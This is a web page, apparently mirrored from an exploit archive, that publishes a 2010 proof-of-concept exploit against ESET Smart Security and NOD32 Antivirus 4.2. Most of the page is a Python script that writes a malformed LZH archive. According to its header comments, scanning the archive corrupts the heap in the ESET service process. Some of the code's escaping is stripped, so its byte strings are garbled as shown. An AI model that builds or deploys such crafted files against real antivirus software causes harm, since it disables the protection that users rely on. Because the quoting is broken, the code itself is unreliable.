Home / os / win7

ESET Smart Security 4.2 / NOD32 Antivirus 4.2 (x32-x64) LZH

Posted on 07 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ESET Smart Security 4.2 / NOD32 Antivirus 4.2 (x32-x64) LZH parsing PoC</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>=======================================================================
ESET Smart Security 4.2 / NOD32 Antivirus 4.2 (x32-x64) LZH parsing PoC
=======================================================================

# ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64)
# LZH archive parsing PoC exploit.
#
# Software:
# http://download.eset.com/download/win/ess/ess_nt32_enu.msi
#
# Scanning of malicious file causes heap corruption in context
# of the service process (ekrn.exe).
# See Dr. Watson log (drwtsn32.log) for details.
#
# USAGE: python eset_lzh.py (TEST.LZH will be created)
#
# (c) 2010 eSage Lab
# http://www.esagelab.com/
# support@esagelab.com
#
 
data = (
&quot;x21&quot;             # Size of archived file header
&quot;x83&quot;             # Checksum of remaining bytes
&quot;-lh&quot;              # ID
&quot;5&quot;                # Compression method (LZW, Arithmetic Encoding)
&quot;-&quot;                # ID
&quot;x13x00x00x00&quot; # Compressed size
&quot;x30x00x00x00&quot; # Uncompressed size
&quot;xFBx3Ax6Cx3B&quot; # Original file date/time
&quot;x20x01&quot;         # File attribute
&quot;x08&quot;             # File name length
&quot;TEST.TXT&quot;         # File name
&quot;xDCx41x4Dx00x00x00x0Bx33x6Dx66x49x5D&quot; # !!! broken LZW compressed data
&quot;x23x08x8Ax78x00x00xC0x81xA5xC0xD7x20&quot; #
)
 
print &quot;ESET Smart Security 4.2 and NOD32 Antivirus 4.2 (x32-x64) LZH File parsing PoC exploit&quot;
print &quot;(c) 2010 eSage Lab&quot;
print &quot;----------------------------&quot;
 
f = open(&quot;TEST.LZH&quot;, 'wb')
f.write(data)
f.close()
 
print &quot;TEST.LZH (%d bytes) created&quot; % len(data)
print &quot;Now try to scan it with antivirus&quot;


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-07]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :